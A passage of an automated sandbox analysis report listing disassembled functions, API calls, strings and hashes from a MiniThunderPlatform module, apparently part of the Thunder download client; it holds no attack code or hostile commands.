                                                                                                                                                • Part of subcall function 10001429: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000146C
                                                                                                                                              • _putenv.MSVCR71(?,?,?,00000000), ref: 1001C316
                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 1001C319
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C34D
                                                                                                                                              • _putenv.MSVCR71(1027AD80), ref: 1001C392
                                                                                                                                              • GetLastError.KERNEL32 ref: 1001C395
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn_frame.dll), ref: 1001C3CC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn_frame_dll), ref: 1001C3E1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(com_plugin), ref: 1001C3F7
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?), ref: 1001C433
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C443
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C453
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C463
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C473
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71({A091AD25-4931-4569-9EC2-14FF003DE671}), ref: 1001C484
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn_frame_clsid), ref: 1001C499
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(com_plugin), ref: 1001C4AA
                                                                                                                                                • Part of subcall function 10015928: __EH_prolog.LIBCMT ref: 1001592D
                                                                                                                                                • Part of subcall function 10015928: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,00000000,?,00000017), ref: 10015976
                                                                                                                                                • Part of subcall function 10015928: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000017), ref: 10015991
                                                                                                                                                • Part of subcall function 10015928: RtlLeaveCriticalSection.NTDLL(-00000004), ref: 1001599E
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?), ref: 1001C4E6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C4F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C506
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C516
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C526
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C53C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C54C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C559
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C566
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C573
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C580
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prologV12@$V12@@$?assign@?$basic_string@CriticalErrorLastSectionV01@@_putenv$?append@?$basic_string@?erase@?$basic_string@?rfind@?$basic_string@?substr@?$basic_string@CountCreateEventInitializeLeaveTick
                                                                                                                                              • String ID: DOWNLOG_ROOT=$THUNDER_HOME=$asyn_frame.dll$asyn_frame_clsid$asyn_frame_dll$com_plugin$download_log\$prop.txt${A091AD25-4931-4569-9EC2-14FF003DE671}
                                                                                                                                              • API String ID: 2180693992-3392846211
                                                                                                                                              • Opcode ID: d797e88c20912f0b79eff0e09e95012e408c8e83dc539a7964defd79ed3f5ec9
                                                                                                                                              • Instruction ID: 6d9f1b8b60f806b3b9c71144add82350b0d12458a54662a6e3de6a7ab1c2fab2
                                                                                                                                              • Opcode Fuzzy Hash: d797e88c20912f0b79eff0e09e95012e408c8e83dc539a7964defd79ed3f5ec9
                                                                                                                                              • Instruction Fuzzy Hash: 42C14E74800259DFDB25CBA4C988BDEBBF8EF29304F04849DE54A93251DB706788DF21
                                                                                                                                              Function 1001B499 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 387COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 733 1001b499-1001b4e9 call 10025930 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z * 2 736 1001b4f2-1001b4fb 733->736 737 1001b4eb-1001b4ed 733->737 742 1001b527-1001b551 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 1001859e 736->742 743 1001b4fd-1001b522 736->743 738 1001b909-1001b925 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 737->738 740 1001b998-1001b9b6 call 10025980 738->740 748 1001b553-1001b556 742->748 749 1001b55b-1001b569 call 10018301 742->749 743->738 750 1001b8f9-1001b903 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 748->750 753 1001b5b4-1001b5cb ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 749->753 754 1001b56b-1001b56f call 1006d306 749->754 750->738 755 1001b5d4-1001b5e7 753->755 756 1001b5cd-1001b5cf 753->756 757 1001b572-1001b574 754->757 761 1001b5e9 755->761 762 1001b5ec-1001b5ee 755->762 756->750 758 1001b576-1001b59f call 1001694c call 1001b0a2 757->758 759 1001b5ad-1001b5b3 ??3@YAXPAX@Z 757->759 758->748 775 1001b5a1-1001b5ab RtlLeaveCriticalSection 758->775 759->753 761->762 764 1001b5f0-1001b5f2 762->764 765 1001b5f4-1001b617 lstrlen call 10025ed0 call 10010b6c 762->765 767 1001b61c-1001b631 CLSIDFromString 764->767 765->767 771 1001b633 767->771 772 1001b636-1001b691 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 100269ac ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z 767->772 771->772 778 1001b697-1001b738 call 10013770 call 10001534 ?assign@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ * 2 call 10013610 call 100013d0 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 772->778 779 1001b73e-1001b745 772->779 775->748 778->779 780 1001b747 779->780 781 1001b74a-1001b757 LoadLibraryW 779->781 780->781 783 1001b75d-1001b789 call 10013460 781->783 784 1001b94f-1001b996 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 781->784 791 1001b927-1001b947 call 10001280 FreeLibrary 783->791 792 1001b78f-1001b7c0 call 1001694c call 1001b0a2 783->792 784->740 791->784 800 1001b949-1001b94b 791->800 803 1001b7c2-1001b7c6 RtlLeaveCriticalSection 792->803 804 1001b7cc-1001b7d5 792->804 800->784 803->804 805 1001b7d9-1001b7dc 804->805 806 1001b882-1001b8a8 call 1001694c call 1001a875 805->806 807 1001b7e2-1001b81c call 1001694c call 1001a875 call 1001b0a2 805->807 816 1001b8b4-1001b8d4 call 10001280 FreeLibrary 806->816 817 1001b8aa-1001b8ae RtlLeaveCriticalSection 806->817 822 1001b828-1001b844 call 1000fc10 807->822 823 1001b81e-1001b822 RtlLeaveCriticalSection 807->823 824 1001b8d6-1001b8d8 816->824 825 1001b8dc-1001b8f3 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ 816->825 817->816 829 1001b846-1001b84c 822->829 830 1001b869-1001b875 822->830 823->822 824->825 825->750 831 1001b865-1001b867 829->831 832 1001b877-1001b879 830->832 833 1001b87d-1001b880 830->833 831->830 834 1001b84e-1001b858 call 100184d9 831->834 832->833 833->825 837 1001b862 834->837 838 1001b85a-1001b85d call 1001b499 834->838 837->831 838->837
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001B49E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1001B4C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1001B4D7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B910
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B91D
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 1001B935
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B959
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 1001B966
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B976
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B983
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B990
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@V01@@$??1?$basic_string@_FreeH_prologLibraryU?$char_traits@_V?$allocator@_W@2@@std@@W@std@@
                                                                                                                                              • String ID: dl_peer_id.dll
                                                                                                                                              • API String ID: 3699617589-3148526724
                                                                                                                                              • Opcode ID: c000d13098792536980d5186f7516fd3df141c0c3608b231b50084b773025c6a
                                                                                                                                              • Instruction ID: 577ee272a92e38a90bafcd6bdb8f7bcc5c9304164d2cbe581adf577bc3eed7f8
                                                                                                                                              • Opcode Fuzzy Hash: c000d13098792536980d5186f7516fd3df141c0c3608b231b50084b773025c6a
                                                                                                                                              • Instruction Fuzzy Hash: C0F16E71900269DFDB50DBA4CD8CBDDBBB9EF19704F1081D9E40AA7251DB70AA88CF61
                                                                                                                                              Function 100B0650 Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 191COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 978 100b0650-100b069b call 100258ac 981 100b06a8 978->981 982 100b069d-100b06a6 call 100e986d 978->982 984 100b06aa-100b08da call 1006e2c0 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 3 call 1006d7fe ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 call 1008a210 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 3 call 10071e70 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 GetModuleFileNameA 981->984 982->984 994 100b091a-100b0992 call 10027770 call 10027700 call 100298f0 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 1006e189 call 10075759 984->994 995 100b08dc-100b0914 call 1000f910 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 984->995 1007 100b0997-100b09d0 call 10023953 call 10025980 994->1007 995->994
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B06D0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B06E1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100B070E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(user_id), ref: 100B0728
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env), ref: 100B073F
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100B077B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B078D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B079F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B07B1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B07C2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B07EA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B07FB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(xl_dl_minitp), ref: 100B080A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(tp_service_name), ref: 100B0824
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env), ref: 100B083B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?), ref: 100B0877
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B0889
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B089B
                                                                                                                                                • Part of subcall function 100E986D: __EH_prolog.LIBCMT ref: 100E9872
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100B06A4,?), ref: 100E9893
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B06A4,?), ref: 100E98A3
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B06A4,?), ref: 100E98B3
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B06A4,?), ref: 100E98C3
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B06A4,?), ref: 100E98D3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B08AD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B08BE
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100B08D2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B0903
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B0914
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B0970
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B0984
                                                                                                                                                • Part of subcall function 1000F910: ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 1000F976
                                                                                                                                                • Part of subcall function 1000F910: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71(?,0000002E,?,0000002E,?,0000002E,?), ref: 1000F9A1
                                                                                                                                                • Part of subcall function 1000F910: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 1000F9AE
                                                                                                                                                • Part of subcall function 1000F910: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1000F9B5
                                                                                                                                                • Part of subcall function 1000F910: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 1000F9BC
                                                                                                                                                • Part of subcall function 1000F910: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1000F9C3
                                                                                                                                                • Part of subcall function 1000F910: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 1000F9CA
                                                                                                                                                • Part of subcall function 1000F910: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1000F9D1
                                                                                                                                                • Part of subcall function 1000F910: ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 1000F9E3
                                                                                                                                                • Part of subcall function 1000F910: ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 1000F9F8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@std@@@std@@$?assign@?$basic_string@V12@V12@@$??6?$basic_ostream@V01@$??$?6D@std@@@0@V10@V?$basic_ostream@$??0?$basic_stringstream@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@FileH_prologModuleNameV?$basic_string@malloc
                                                                                                                                              • String ID: env$tp_service_name$user_id$xl_dl_minitp
                                                                                                                                              • API String ID: 1040288741-3865713830
                                                                                                                                              • Opcode ID: 95b96ee2b806743b11db6755c460b4c4d2cdd98ad9971ae3f56291ecb4bd71ee
                                                                                                                                              • Instruction ID: 6787b238185d3f09b63d45b5ab80c24da4fce1e8e2686d38d315fed542d3cb4a
                                                                                                                                              • Opcode Fuzzy Hash: 95b96ee2b806743b11db6755c460b4c4d2cdd98ad9971ae3f56291ecb4bd71ee
                                                                                                                                              • Instruction Fuzzy Hash: 4A913B750083959FD334DF61C89CBDBBBE4FBA9705F008A5DE48A82291EB756108CF52
                                                                                                                                              Function 00422310 Relevance: 49.4, APIs: 21, Strings: 7, Instructions: 404synchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1012 422310-422360 call 417555 call 417d39 1017 422362 1012->1017 1018 422369-42236d 1012->1018 1017->1018 1019 422385-42239c call 4182d4 1018->1019 1020 42236f-422372 call 41731b 1018->1020 1026 4223a2-4223ef call 41752d ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 CreateMutexW call 418004 1019->1026 1027 422467-42246b 1019->1027 1024 422377-42237c 1020->1024 1024->1019 1025 42237e 1024->1025 1025->1019 1055 4223f4-42241a ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1026->1055 1029 422485-422489 1027->1029 1030 42246d-422472 call 417159 1027->1030 1033 422620-422624 1029->1033 1034 42248f-422524 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 418004 call 41714a ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z call 418004 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 GetPrivateProfileStringW call 418004 1029->1034 1036 422477-42247c 1030->1036 1038 422652-422656 1033->1038 1039 422626-42262a call 417032 1033->1039 1103 422540-4225db call 417bb3 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z call 418004 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 4172a3 1034->1103 1104 422526-42253d call 41828e 1034->1104 1036->1029 1044 42247e 1036->1044 1041 422658-42265c call 4170e6 1038->1041 1042 4226ad-4226b1 1038->1042 1046 42262f-42263f 1039->1046 1054 422661-422671 1041->1054 1050 4226b7-4226c2 call 417b04 1042->1050 1051 42273c-422740 1042->1051 1044->1029 1046->1038 1053 422641-42264d call 417410 1046->1053 1059 4226c7-4226d7 1050->1059 1056 422742-422791 1051->1056 1057 422794-422798 1051->1057 1053->1038 1054->1042 1061 422673-42268b call 417410 1054->1061 1077 422423-422437 GetLastError call 418004 1055->1077 1078 42241c 1055->1078 1056->1057 1063 42279e-4227a5 1057->1063 1064 42288c-4228ae ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1057->1064 1059->1051 1069 4226d9-4226f1 call 417410 1059->1069 1061->1042 1083 42268d-4226a6 CloseHandle call 418004 1061->1083 1063->1064 1066 4227ab-4227c6 call 418351 1063->1066 1081 4228b4-4228e2 call 417726 call 418004 1064->1081 1086 4227f7 1066->1086 1087 4227c8-4227f5 call 4183d3 1066->1087 1090 422713-42271a 1069->1090 1091 4226f3-42270c CloseHandle call 418004 1069->1091 1077->1027 1093 422439-422462 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1077->1093 1078->1077 1083->1042 1098 422801-42282f call 417c6c 1086->1098 1087->1098 1090->1051 1099 42271c-422735 CloseHandle call 418004 1090->1099 1091->1090 1093->1081 1098->1064 1117 422831-422887 